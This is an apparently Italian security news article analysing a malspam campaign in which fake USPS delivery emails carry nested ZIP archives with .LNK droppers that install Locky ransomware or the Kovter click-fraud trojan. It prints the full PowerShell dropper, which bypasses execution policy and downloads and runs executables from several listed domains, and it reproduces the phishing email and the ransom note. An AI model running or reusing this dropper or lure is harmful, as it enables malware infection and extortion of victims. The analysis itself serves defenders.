Attenzione agli allegati .LNK con ransomware Locky e click-fraud trojan Kovter

Il centro di ricerca Microsoft TechNet segnala di aver rilevato in questi giorni una massiccia campagna di diffusione di email contenenti in allegato archivi compressi ZIP multilivello con all’interno file con estensione LNK che, se aperti, infettano il PC con il ransomware Locky o con il click-fraud Trojan Kovter.

La mail si presenta come proveniente da USPS Priority e con oggetto “USPS courier can not deliver parcel #42746295669 to you”, con il seguente testo:

Dear Customer,

This is to confirm that your item has been shipped at January 24.
Please review delivery label in attachment!

Kind regards,
Leslie Riggs,
USPS Support Clerk.

In allegato si trova un archivio ZIP dal nome “Delivery-Receipt-42746295669.zip”, che al suo interno contiene un ulteriore archivio ZIP dal nome “Delivery-Receipt-42746295669.doc.zip” contenente questa volta il vero e proprio dropper, con estensione LNK e avente nome “Delivery-Receipt-42746295669.doc.lnk”.

Il file allegato ovviamente non è un link file di Windows (che avrebbe correttamente estensione .LNK) bensì uno script PowerShell, contenente il seguente codice:

L?F? ?P?O? ?:i?+00?/C:\R1Windows?*WindowsV1System32?*System32p1WindowsPowerShell?*WindowsPowerShell J1v1.0?*v1.0h2powershell.exe?*powershell.exe?-ExecutionPolicy ByPass -NoProfile -command function g($f) { Start $f; }; $ll = ‘www.gifizsee.de’,’jb-sounddesign.de’,’www.diyday.be’,’www.givtao.com’,’enfantsdusoleil.org’; $y = New-Object System.Net.WebClient; $ld = 0; $cs = [char]92; $fn = $env:temp+$cs; $lk = $fn+’a.txt’; $dc = $fn+’a.doc’; if (!(Test-Path $lk)) { New-Item -Path $fn -Name ‘a.txt’ -ItemType File; for($n=1; $n -le 2; $n++) { for($i=$ld; $i -lt $ll.length; $i++) { $dn = 0; $f = $fn+’a’+$n+’.exe’; $u = ‘http://’+$ll[$i]+’/counter/?zZcF8RIueCOUHrMcMbN9fd4jYg_rwM_9YPSTKPVX59ZfZuR4pCQOSZGPgxmE7WOtEINLnu4S8cwKXqBV70PAPzEt’+$n; $y.DownloadFile($u, $f); if (Test-Path $f) { $var = Get-Item $f; if ($var.length -gt 10000) { $dn = 1; g($f); }; if($dn -eq 1) { $ld=$i; break; }; }; }; }; };notepad.exe?%??wN??]N?D.??Q?????1SPS?XF?L8C???&?m?q/5273481351694451525512458582772591848382716512

Si nota come il dropper – che ricordiamo ha il compito di scaricare sul PC il vero e proprio malware, cioè il payload – compone la URL dalla quale scaricare il ransomware o il trojan partendo dai domini www.gifizsee.de’, ‘jbsounddesign.de’, ‘www.diyday.be’, ‘www.givtao.com’, ‘enfantsdusoleil.org’ e componendo il resto in base a dei parametri modificati a tempo di esecuzione.

Questo stratagemma permette una discreta possibilità per i criminali di variare di volta in volta il tipo di malware da scaricare e la fonte, così da superare anche ostacoli come la chiusura o il ban di alcuni domini o indirizzi.

Il ransomware Locky è ormai ben noto, così come anche i suoi eredi come Zepto, i ricercatori non hanno ancora scoperto come decriptare i file cifrati dal cryptovirus e la quantità d’infezioni rilevate ormai è altissima.

Quando il dropper attiva il download del payload contenente nel ransomware Locky, il PC infettato subisce la cifratura dei file che vengono rinominati aggiungendo l’estensione .OSIRIS e compare sul display questa schermata:

All’indirizzo g46mbrrzpfszonuk.onion/32C0D883E1644D0A, accedibile nel dark web tramite il sistema Tor, si trova la solita pagina di richiesta di riscatto che a seguito del pagamento di 0.5 Bitcoin permette alla vittima di scaricare il decryptor che rimetterà a posto i file criptati. I delinquenti infatti dichiarano “We present a special software – Locky Decryptor™ –
which allows to decrypt and return control to all your encrypted files.” spiegando poi come procedere con l’acquisto:

How to buy Locky Decryptor™?
You can make a payment with BitCoins, there are many methods to get them.
You should register BitCoin wallet:
Simplest online wallet or Some other methods of creating wallet
Purchasing Bitcoins, although it’s not yet easy to buy bitcoins, it’s getting simpler every day.

Here are our recommendations:
localbitcoins.com (WU) Buy Bitcoins with Western Union.
coincafe.com Recommended for fast, simple service.
Payment Methods: Western Union, Bank of America, Cash by FedEx, Moneygram, Money Order. In NYC: Bitcoin ATM, in person.
localbitcoins.com Service allows you to search for people in your community willing to sell bitcoins to you directly.
cex.io Buy Bitcoins with VISA/MASTERCARD or wire transfer.
btcdirect.eu The best for Europe.
bitquick.co Buy Bitcoins instantly for cash.
howtobuybitcoins.info An international directory of bitcoin exchanges.
cashintocoins.com Bitcoin for cash.
coinjar.com CoinJar allows direct bitcoin purchases on their site.
anxpro.com
bittylicious.com

Send 0.5 BTC to Bitcoin address: 1C258J43so5QYiSHifJQ8FYDEMgJX6dHTg

Note: Payment pending up to 30 mins or more for transaction confirmation, please be patient…

E’ però interessante notare come per questa campagna d’infezione i delinquenti abbiano deciso di alternare il cryptovirus con un trojan come Kovter, che visita di nascosto e all’insaputa della vittima, dal suo PC, i siti contenenti banner pubblicitari, cliccandoli così da far guadagnare ai proprietari gli introiti forniti dai publisher dei circuiti di advertising. Tramite diverse istanze di Internet Explorer, infatti, il malware Kovter apre in background i siti, li visita e clicca sui banner di advertising, oltre a inviare al server di controllo alcuni dati del PC che ha infettato.

La pericolosità di Kovter risiede nel fatto che tramite un meccanismo di persistenza file-less riesce a nascondersi particolarmente bene dagli antivirus che, quindi, non lo rilevano e lo lasciano sopravvivere sui sistemi infettati anche per parecchio tempo.

Chi fosse interessato ad analizzare il malware può scaricare il sample che abbiamo caricato durante la redazione del presente articolo, con visibilità pubblica, su Virustotal e su Hybrid-Analysis.